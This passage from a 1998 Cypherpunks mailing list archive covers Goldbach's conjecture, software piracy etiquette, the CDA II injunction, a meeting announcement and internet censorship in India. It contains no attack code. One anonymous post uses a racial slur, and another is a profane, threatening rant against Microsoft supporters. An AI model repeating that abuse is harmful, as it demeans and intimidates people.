   industry. But we're still enslaved by laws created during the British
   Raj, even in high priority areas like telecom."
   
   [1324 Words]

     _________________________________________________________________
   
   Notes:
   
    1. Dr. Arun Mehta's petition is at
       <http://members.tripod.com/~india_gii/telepet.html>.

    2. The Forum for Rights to Electronic Expression articles are at
       <http://www.eff.org/pub/Groups/FREE>

    3. Censored sites:
          + http://www.sensenet.net/ (Currently blocked)
          + http://www.trade-india.com/ (Now accessible on a new server)
          + http://www.aptc-india.com/ (Now accessible on a new server)
          + http://www.edcil.org/ (Now accessible on a new server)
          + http://www.newgensoft.com/ (Now accessible on a new server)
          + http://www.newgen.net/ (Now accessible on a new server)
          + http://www.connectmagazine.com/ (Now accessible on a new server)
          + http://www.net2phone.com/ (Currently blocked)
          + http://www.vocaltec.com/ (Currently blocked)
          + http://www.netspeak.com/ (Currently blocked)

    4. Email addresses:
          + Dr. Arun Mehta - amehta@cerf.net
          + Ashish Gulhati - ashish@generalogic.com
          + Ashok Agarwal - ashokagr@del2.vsnl.net.in
          + Dr. Pawan Jaitly - pawan@generalogic.com
          + Rishab Aiyer Ghosh - ghosh@firstmonday.dk
          + Vipul Ved Prakash - vipul@generalogic.com

     _________________________________________________________________
   
   Rev: SNPR v0.06 1998/11/17 15:58:14 webmaster@generalogic.com


-- 

VIPUL VED PRAKASH              Cryptography.             "Everything is what 
mail@vipul.net             |   Distributed Systems. |    it is because it got
http://vipul.net/          |   Network Agents.      |    that way." 
91 11 2233328              |   Perl Hacking.        |  
198 Madhuban IP Extension  |   Linux.               |        d'arcy thompson.
Delhi, INDIA 110 092      /    Networked Media.    /




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Fri, 20 Nov 1998 04:38:03 +0800
To: cypherpunks@cyberpass.net
Subject: simple socket forwarder
Message-ID: <4a450e23d08fc272ab3f6260ccf0edcd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Does anyone have a simple packet forwarder to run
on a unix system? I want to set up a daemon on an
account to just redirect traffic from a particular port
to another host for some basic anonymity, but I don't
have experience doing socket coding, nor a book.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Nov 1998 20:28:55 +0800
To: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
Subject: RE: CJ's Teeth/Glasses
In-Reply-To: <9F00F15E736BD11196B700A0C98448FE0A9880@WR-SEA-SERVER-2>
Message-ID: <199811201206.HAA30839@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff,

Alia has written that you sent CJ's teeth to him at the AZ
Correctional Corporation of America but he never got them
(nor stuff she sent). Guess that's an indication of the 
superior quality of gov-regged private-run jails -- or mails.

Thanks for the reminder that CJ inquiries got to go through 
gov-regged private-run attorneys who are ever in conference
and don't return calls.

John


At 10:36 AM 11/19/98 -0500, you wrote:
>John, 
>
>I have responded directly to Alia on this matter.  It is *normal* for us
>to deal with the defense attorney on these types of situations, but not
>necessarily a requirement.  I would need something from either CJ or his
>attorney authorizing me to discuss the situation with you.  
>
>Jeff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 21:27:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: More Goldbach's Conjecture (fwd)
Message-ID: <199811201307.HAA09998@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Nov 1998 10:08:16 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: More Goldbach's Conjecture

> Evidently there is a printing error. 'n>6' should read 'n>=6'. Then
> they are equivalent (if one considers 4 = 2 + 2 to be known).

Or they don't like:

2 + 2

or,

3 + 3


Take your pick, either are equaly likely.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 20 Nov 1998 14:35:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811200611.HAA24436@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat <wombat@mcfeely.bsfs.org> crapped:
>
>Hey, asshole, keep my name outta this.
>

Nigga-lovin' asswipe, get yerself off this list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 22:00:25 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Goldbach's Conjecture - the various definitions
Message-ID: <199811201329.HAA10119@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Now before somebody gets a bee in their bonnet....

Yes, the VNR has a typo in respect to the '6', it should be >2.

As to the various other definitions that folks have been submitting. I'm not
real sure what their exact point is since it's agreed by all that it's:

...all even numbers greater than 2..., and Goldbach believed it had to be
three prime factors while Fermat pointed out it could always be 2.

As to the two defintions that accredit the reduction from 3 to 2 to Goldbach
while leaving Fermat out of the picture fail to explain why Fermat's point
is called Fermat's in the first place.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Fri, 20 Nov 1998 09:31:56 +0800
To: Ray Jones <rjones@pobox.com>
Subject: Re: manners and piracy
In-Reply-To: <ppwlnl7buho.fsf@pixie.mit.edu>
Message-ID: <Pine.GSO.3.96.981120085459.6081A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



> how could someone giving you a "copy of statgraphics" not be
> considered priracy?  or were you looking for a donation.  if so, you
> should have been much more explicit about what you wanted.
> 
> > Well anyway thank you for your reply.
> > What I'm trying to point out is this
> >   it is OK with me if you say "Take your piracy requests elsewhere" 
> >   it is not OK with me if you say " ...fuck yourself"
> 
> what we're trying to point out is this
>   it is not OK with us if you send warez requests to the list.

It is the duty of all to say "Hey! respect intellectual property!" 
I too am against piracy, now I know that that software i.e statgraphics
is not a shareware. 

Thank you.
Exactly my point
  it is OK if you say
    "it is not OK with us if you send warez requests to the list."
  it is not OK if you say ".... fuck yourself"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 21 Nov 1998 00:01:10 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Goldbach's Conjecture (fwd)
Message-ID: <199811201515.JAA10514@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Nov 1998 09:41:01 -0600
> From: Mark Hahn <mhahn@tcbtech.com>
> Subject: RE: Goldbach's Conjecture (fwd)

> At 09:39 PM 11/19/98 -0600, Jim Choate instructed:
> >It's interesting that Fermat doesn't mention that the only prime that can
> >use two as a factor is 4. And you can't factor 2 at all since we eliminate
> >1 as a potential candidate (another issue of symmetry breaking simply so we
> >don't have to write '....works for every prime but 1' on all our theorems).
> 
> I thought I was following along until I got here, and got very lost. First
> question: I think the first sentence implies 4 is prime, so I must have
> the emphasis wrong.

No, I made a typo. I got so focused on primes last nite that I seem to have
typed it in instead of 'even'. I didn't notice it when I saw it posted to
the list. My mistake, sorry for the confusion.

What started this whole enquiry for me was the realization that the
multiplication identity axiom is related to the definition of a prime. Then
add on top of that the reason we exclude 1 is so we don't have to write
'...except for the prime 1' on the end of lots of number theory (re Richard
Feynman's comment during the Challenger Investigation). It was the 
realization that if we go ahead and include 1 so the axioms are in line with
each other (and use our cut&paste feature for the '...1...') then perhaps it
would provide a more consistent base and just maybe some of the extant
problems in number theory might become solvable in other ways. My original
intention was to get a copy of Doug Lenat's EURISKO theorem proving program
and change the definition of prime in its database and note the results
(after converting it to Perl from LISP). What started all that is that I'm
slowly going through 'An Introduction to Algebraic Structures' by J. Landin
(Dover) creating a cheat-sheet of number theory that eventualy I hope to post
on my webpage for reference.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Nov 1998 22:58:35 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: RE: manners
In-Reply-To: <E0zgWuD-0007Hg-00@hen.scotland.net>
Message-ID: <199811201423.GAA28061@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:48 AM 11-19-98 -0800, Tim May wrote:
>Nonsense. I am not "implicated" as an accessory to anything. Speak for
>yourself only.
>
>There is no basis in law for the notion that several hundred subscribers to
>a mailing list are implicated in something because others talk about it.
>Get real.

One might as well claim that all the millions of subscribers to the LA
Times are "implicated" as accessories to an act that was described in the
paper's pages.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Nov 1998 23:16:35 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FC: For Judge Reed, nixing CDA II was a difficult decision
Message-ID: <199811201436.GAA00614@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Sender: declan@mail.well.com
>X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.2 
>Date: Fri, 20 Nov 1998 09:12:22 -0500
>To: politech@vorlon.mit.edu
>From: Declan McCullagh <declan@well.com>
>Subject: FC: For Judge Reed, nixing CDA II was a difficult decision
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>
>
>http://www.wired.com/news/news/politics/story/16387.html
>
>                     by Declan McCullagh 
>                     3:00 a.m.  20.Nov.98.PST
>
>                     US District Judge Lowell A. Reed Jr. is a
>                     reluctant free speech advocate. 
>
>                     It took him all day Thursday to accept
>                     that the CDA II, scheduled to take effect
>                     on Friday, would have let federal
>                     prosecutors punish any American who
>                     operates Web sites with material deemed
>                     "harmful to minors." 
>
>                     By the time he finally decided to bar the
>                     Justice Department from enforcing the
>                     law, he painstakingly outlined how
>                     difficult his decision was. "The court has
>                     and will give careful analytical deference
>                     to" an act of Congress, he said. 
>
>                     Reed's reluctance is easy enough to
>                     understand. In language sure to give
>                     even the most steely-nerved judge the
>                     jitters, the US Supreme Court has called
>                     any court's decision to strike down an act
>                     of Congress "the gravest and most
>                     delicate duty that [it can be] called upon
>                     to perform."
>
>                     [...]
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Fri, 20 Nov 1998 23:21:23 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Goldbach's Conjecture (fwd)
In-Reply-To: <199811200339.VAA08272@einstein.ssz.com>
Message-ID: <3.0.1.32.19981120094101.00946d40@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:39 PM 11/19/98 -0600, Jim Choate instructed:
>It's interesting that Fermat doesn't mention that the only prime that can
>use two as a factor is 4. And you can't factor 2 at all since we eliminate
>1 as a potential candidate (another issue of symmetry breaking simply so we
>don't have to write '....works for every prime but 1' on all our theorems).

I thought I was following along until I got here, and got very lost. First
question: I think the first sentence implies 4 is prime, so I must have
the emphasis wrong.

Unless you are saying that you cannot factor 4 as 2*2 because < of
something I missed >. So the only factorization of 4 is 4*1, hence 
four is prime. 

The other explanation is "Whoosh" the whole conversation when over
my head and I'm lost.

-MpH


--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 20 Nov 1998 17:08:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811200841.JAA04096@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Moahahahahahahahahahahahahahahahahahah
u STOOPID dickheads and fuckwads supporting
CUNTS like micro$oft or even working there.
FUCK YOU lousy cockroaches. I, the great
tormentor and terminator will stamp you
out and exterminate you like the pests you
are.
HaHaHaHaHaHa mothafuckaz.
You will all die and give way to a better
world, better people and better systems.
Long live Unix, Mac, Amiga and TERROR.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 20 Nov 1998 18:54:26 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: More Goldbach's Conjecture
In-Reply-To: <199811200702.BAA09369@einstein.ssz.com>
Message-ID: <36553180.613A5017@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Well there are two more definitions, from the same book [1], that are not
> equivalent:
> 
> pp. 335
> 
> For all natural numbers x, if x is even, non-zero, and not 2, then there
> exist prime numbers y and z such that x is the sum of y and z.
> 
> pp. 673
> 
> ...every even number, n>6 (it at least takes care of my question about 4),
>  is the sum of two odd primes.

> [1] VNR Concise Encyclopedia of Mathematics


Evidently there is a printing error. 'n>6' should read 'n>=6'. Then
they are equivalent (if one considers 4 = 2 + 2 to be known).

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@www.playboy.com>
Date: Sat, 21 Nov 1998 01:07:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: manners and piracy
In-Reply-To: <ppwlnl7buho.fsf@pixie.mit.edu>
Message-ID: <v04011762b27b376785a3@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:59 PM -0500 11/19/98, Bernardo B. Terrado wrote:
>> how could someone giving you a "copy of statgraphics" not be
>> considered priracy?  or were you looking for a donation.  if so, you
>> should have been much more explicit about what you wanted.
>> > Well anyway thank you for your reply.
>> > What I'm trying to point out is this
>> >   it is OK with me if you say "Take your piracy requests elsewhere"
>> >   it is not OK with me if you say " ...fuck yourself"
>> what we're trying to point out is this
>>   it is not OK with us if you send warez requests to the list.
>It is the duty of all to say "Hey! respect intellectual property!"
>I too am against piracy, now I know that that software i.e statgraphics
>is not a shareware.

	Go fuck yourself.

	I have no responsibility to do anything YOU regard as a duty.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 21 Nov 1998 01:16:05 +0800
To: drg@pgh.org (Dr.G)
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <Pine.LNX.3.96.981120105716.5048B-100000@www5.localweb.com>
Message-ID: <199811201619.KAA17451@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Dr.G wrote:
> 
> On Thu, 19 Nov 1998, Igor Chudov @ home wrote:
> 
> > Date: Thu, 19 Nov 1998 14:51:58 -0600 (CST)
> > From: "Igor Chudov @ home" <ichudov@Algebra.Com>
> > To: Steve Schear <schear@lvcm.com>
> > Cc: apf2@apf2.com, cypherpunks@cyberpass.net, drg@pgh.org
> > Subject: Re: SIGH... NOT!! THC tainted oranges
> > 
> > I would certainly appreciate pot yeast.
> > 
> 
> I would certainly appreciate some pot.

Well, I never smoked pot because I do not like the idea of smoking
anything and inhaling all this tar, soot, etc. I saw my friends having
real fun with pot and thought that pot bread or something like that
would be great.

Perhaps I sound very ignorant...

ignoramus

> > Yeast generally is a very tasty thing, and pot yeast will be truly yummy.
> > 
> > You could cook pot bread, pancakes, etc.
> > 
> > igor
> > 
> 
> You use pot for medicine too, and the local supply
> in nil.  I may have to drive to the big Apple.
> 
> > Steve Schear wrote:
> > > 
> > > 
> > > >Nobody that has been on this list very long could have been duped...We all
> > > >know that some group of MIB types would have swooped down on the guy, and
> > > >he would have been just another heart attack statistic...
> > > 
> > > I raised a similar thread last year. I caused quite a bit of comment. Since
> > > then I've discussed the possibility of employing a common yeast or other
> > > organism to allow individuals to create their own home pharmacies with
> > > friends and acquintances in this sector. Their opinions vary but all
> > > assured me that desktop genetic engineering and production capabilities are
> > > likely no more than 10 years away and that fed measures to prevent this
> > > will likely be singularly ineffective.
> > > 
> > > 
> 
> A cannabis garden is a pharmacy in an organic platform.
> 
> -DrG
> 
> > > 
> > 
> > 
> > 
> > 	- Igor.
> > 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@www.playboy.com>
Date: Sat, 21 Nov 1998 01:00:33 +0800
To: Rabid Wombat <schear@lvcm.com>
Subject: Re: Piracy and cypherpunks
In-Reply-To: <v04003a0bb27a95d405ca@[24.1.50.17]>
Message-ID: <v04011763b27b3945f5f1@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:44 PM -0500 11/19/98, Rabid Wombat wrote:
>The best defence for the programmer is to make the software so buggy,
>complex, and poorly documented that enough revenue is obtained through
>support contracts and fees, supplemental documentation, training courses,
>and the like to cover the potential losses to piracy. NT comes to mind. ;)

	A lot of software products seem to fit that description these days.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <protozoa@tux.org>
Date: Sat, 21 Nov 1998 00:29:04 +0800
To: dccp@eff.org
Subject: ANNOUNCE:  DC Cypherpunks Meeting Sat, Nov 21st
Message-ID: <Pine.LNX.4.04.9811201029320.20647-100000@gwyn.tux.org>
MIME-Version: 1.0
Content-Type: text/plain





Crack open your palm pilots and take note!  And please repost widely.  Our
mailing list (dccp@eff.org), along with the rest of eff.org, is sadly out
of commission.

DC Cypherpunks will hold a meeting at the Electronic Privacy Information
Center office in Washington, DC.

DATE:  Soon!  Saturday, November 21, 1998

TIME:  5pm

Featured speaker:  Richard Schroeppel, University of Arizona
		   rcs@cs.arizona.edu

The Hasty Pudding Cipher

"NIST is organizing the search for a new block cipher, the Advanced
Encryption Standard.  The Hasty Pudding Cipher is my entry in the AES
competition.  The design goals for HPC are medium security, speed, and
flexibility.  Hasty Pudding works with any block length and any key
size.  It is optimized for 64-bit architectures, operating at 200 MHz
on large data blocks.  Hasty Pudding introduces a new feature, Spice,
which allows useful non-expanding encryption of small blocks, even
single bits.  The cipher includes some unusual design principles."


Location:  Electronic Privacy Information Center
	   666 Pennsylvania Ave. SE,
	   at the corner of Pennsylvania and 7th in South East DC
	   Across the street from Eastern Market Metro station (Orange & Blue
	   Line)

To get into the building, go around to the 7th street side next to the
flower shop and use the call box to call the EPIC office.  We'll buzz you
in.


True to DCCP form, we'll probably hit a local resturaunt afterwards for dinner.


If you need more explicit directions, please contact Kathleen Ellis at
(202)298-0833 or ellis@epic.org.

Kathleen Ellis Admin. Dir., Electronic Privacy Information Center
     Voice Mail:  (202)298-0833	http://www.epic.org
Keep up with the latest encryption news and events:  http://www.crypto.org

PGP 5.0 Key ID 9bf725b4  65FF B997 62B8 C396 A527 2D6A 4901 F701 9BF7 25B4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Sat, 21 Nov 1998 03:41:27 +0800
To: "'Anonymous'" <cypherpunks@toad.com
Subject: RE:
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD81@DINO>
MIME-Version: 1.0
Content-Type: text/plain



Oh my God! I'm so wrong! I feel so ashamed. Thank you for pointing this out
and correcting me.

ob cipher. I have working implementations of RC-4 and RC-6 with C++ source.
Drop me a line if you'd like a copy.

Harv
hrook@microsoft.com

> -----Original Message-----
> From: Anonymous [mailto:nobody@replay.com]
> Sent: Friday, November 20, 1998 12:41 AM
> To: cypherpunks@toad.com
> Subject: 
> 
> 
> Moahahahahahahahahahahahahahahahahahah
> u STOOPID dickheads and fuckwads supporting
> CUNTS like micro$oft or even working there.
> FUCK YOU lousy cockroaches. I, the great
> tormentor and terminator will stamp you
> out and exterminate you like the pests you
> are.
> HaHaHaHaHaHa mothafuckaz.
> You will all die and give way to a better
> world, better people and better systems.
> Long live Unix, Mac, Amiga and TERROR.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 21 Nov 1998 03:45:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Digital cockroaches, 5 IP's per body by 2000 [CNN]
Message-ID: <3655BB59.76A8@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>    "Everyone will have an average of five IP objects on their body by
>    2000," he predicted. 
>
This is just blue sky space cadet baby wish babble. AKA : typical
marketing spew. The kind of thing you can engage in when your house is
paid off, your bank account is flush and you have a golden parachute.
PureCrap*.

Why would I voluntarily wear five independent tracking devices? So Louis
Freeh can do telemetry and administer electroshock from Windows 2000?
Move the bars closer, baby, I just love a cage. Please, yes I'll pay,
just squeeze me.

Everybody is trying to be the master of tomorrow's slave. ( phrase not
my own )

Just say NO,
Mike

*All of the smell and none of the fertilizer, not even good for growing
tomatoes.

Anyone know a URL for Starion nee Comsec( 3DES telephones ) ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr.G" <drg@pgh.org>
Date: Sat, 21 Nov 1998 00:45:39 +0800
To: "Igor Chudov @ home" <ichudov@Algebra.COM>
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811192052.OAA08530@manifold.algebra.com>
Message-ID: <Pine.LNX.3.96.981120105716.5048B-100000@www5.localweb.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Nov 1998, Igor Chudov @ home wrote:

> Date: Thu, 19 Nov 1998 14:51:58 -0600 (CST)
> From: "Igor Chudov @ home" <ichudov@Algebra.Com>
> To: Steve Schear <schear@lvcm.com>
> Cc: apf2@apf2.com, cypherpunks@cyberpass.net, drg@pgh.org
> Subject: Re: SIGH... NOT!! THC tainted oranges
> 
> I would certainly appreciate pot yeast.
> 

I would certainly appreciate some pot.

> Yeast generally is a very tasty thing, and pot yeast will be truly yummy.
> 
> You could cook pot bread, pancakes, etc.
> 
> igor
> 

You use pot for medicine too, and the local supply
in nil.  I may have to drive to the big Apple.

> Steve Schear wrote:
> > 
> > 
> > >Nobody that has been on this list very long could have been duped...We all
> > >know that some group of MIB types would have swooped down on the guy, and
> > >he would have been just another heart attack statistic...
> > 
> > I raised a similar thread last year. I caused quite a bit of comment. Since
> > then I've discussed the possibility of employing a common yeast or other
> > organism to allow individuals to create their own home pharmacies with
> > friends and acquintances in this sector. Their opinions vary but all
> > assured me that desktop genetic engineering and production capabilities are
> > likely no more than 10 years away and that fed measures to prevent this
> > will likely be singularly ineffective.
> > 
> > 

A cannabis garden is a pharmacy in an organic platform.

-DrG

> > 
> 
> 
> 
> 	- Igor.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 21 Nov 1998 02:14:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture (fwd)
Message-ID: <199811201733.LAA11400@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Nov 1998 18:27:39 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Goldbach's Conjecture (fwd)

> Jim Choate wrote:
> 
> > What started this whole enquiry for me was the realization that the
> > multiplication identity axiom is related to the definition of a prime. Then
> > add on top of that the reason we exclude 1 is so we don't have to write
> > '...except for the prime 1' on the end of lots of number theory (re Richard
> > Feynman's comment during the Challenger Investigation). It was the
> > realization that if we go ahead and include 1 so the axioms are in line with
> > each other (and use our cut&paste feature for the '...1...') then perhaps it
> > would provide a more consistent base and just maybe some of the extant
> > problems in number theory might become solvable in other ways. My original

> If you 'define' 1 to be 'prime', you are 'defining' Goldbach's
> conjecture 'away'! 

Duh.

I'll give you a hint, more than that single problem goes away.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 20 Nov 1998 19:55:51 +0800
To: cypherpunks@cyberpass.net
Subject: New postage stamp
Message-ID: <99c4e400f183f816a06750cf9b8dc791@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



I hear they are coming out with a new "Monica Lewinsky" postage 
stamp. Initially, it will cost $.35. 







However, if you lick it, it will be considerably more expensive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 21 Nov 1998 02:14:15 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: More Goldbach's Conjecture
In-Reply-To: <199811200702.BAA09369@einstein.ssz.com>
Message-ID: <199811201742.LAA18097@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> Well there are two more definitions, from the same book [1], that are not
> equivalent:
> 
> pp. 335
> 
> For all natural numbers x, if x is even, non-zero, and not 2, then there
> exist prime numbers y and z such that x is the sum of y and z.
> 
> pp. 673
> 
> ...every even number, n>6 (it at least takes care of my question about 4),
>  is the sum of two odd primes.

These conjectures are equivalent for numbers > 6. I think that the
discussion of whether numbers 4 and 6 can be expressed as sum of
two primes is completely uninteresting.

Also, since 6 = 3+3, I question why they put strict inequality (> 6)
in the definition on p 673. I think that they could say n > 4. Not that
it matters in any respect.

So I do not see them as "substantially" different, and the difference
between these conjectures does not lead us to any profound thoughts.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Sat, 21 Nov 1998 02:07:29 +0800
To: "CypherPunks" <cypherpunks@Algebra.COM>
Subject: RE: Goldbach's Conjecture (fwd)
In-Reply-To: <199811200520.XAA08942@einstein.ssz.com>
Message-ID: <002701be14a9$088b5490$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



First, let me add yet another reference. This one is from _Number Theory in
Science and Communication_ by M.R. Schroder, pg. 96:

"One of the most enduring (if not endearing) conjectures is the famous
Goldbach conjecture, asserting that every even number >4 is the sum of two
primes."

I would argue they're all essentially equivalent.  Here's how they all
agree:

Goldbach's conjecture is that every even number is expressible as the sum of
TWO primes.

The variations are: (1)Goldbach's "original" conjecture versus his revised
conjecture after communication with Euler and (2) excluding four while
adding an odd-primes-only condition (four IS the sum of two EVEN primes,
namely 2 and 2). I think these variations are simply different depths/points
of view of the same idea and one who focuses on semantic differences is
missing the point.

Cutting to the chase, Goldbach's conjecture concerns the sum of EXACTLY TWO
primes stands, and your statement "If we allow repetition *and* the number 2
as a prime then all even numbers can be written as a string of 2's summed
appropriately" is thereby contradicted.

Let me conclude with this inspirational quote from a man whose name escapes
me: "Young men should write proofs, old men should write books." ; )

Blake Buzzini, PSU

-----Original Message-----
From:	owner-cypherpunks@Algebra.COM [mailto:owner-cypherpunks@Algebra.COM]
On Behalf Of Jim Choate
Sent:	Friday, November 20, 1998 12:20 AM
To:	Cypherpunks Distributed Remailer
Subject:	RE: Goldbach's Conjecture (fwd)


Forwarded message:

> From: "Blake Buzzini" <bab282@psu.edu>
> Subject: RE: Goldbach's Conjecture (fwd)
> Date: Thu, 19 Nov 1998 23:37:09 -0500

> >From _Elementary Theory of Numbers_ by William J. LeVeque, pg. 6:
>
> "It was conjectured by Charles Goldbach in 1742 that every even integer
> larger than 4 is the sum of two odd primes.  (All primes except 2 are odd,
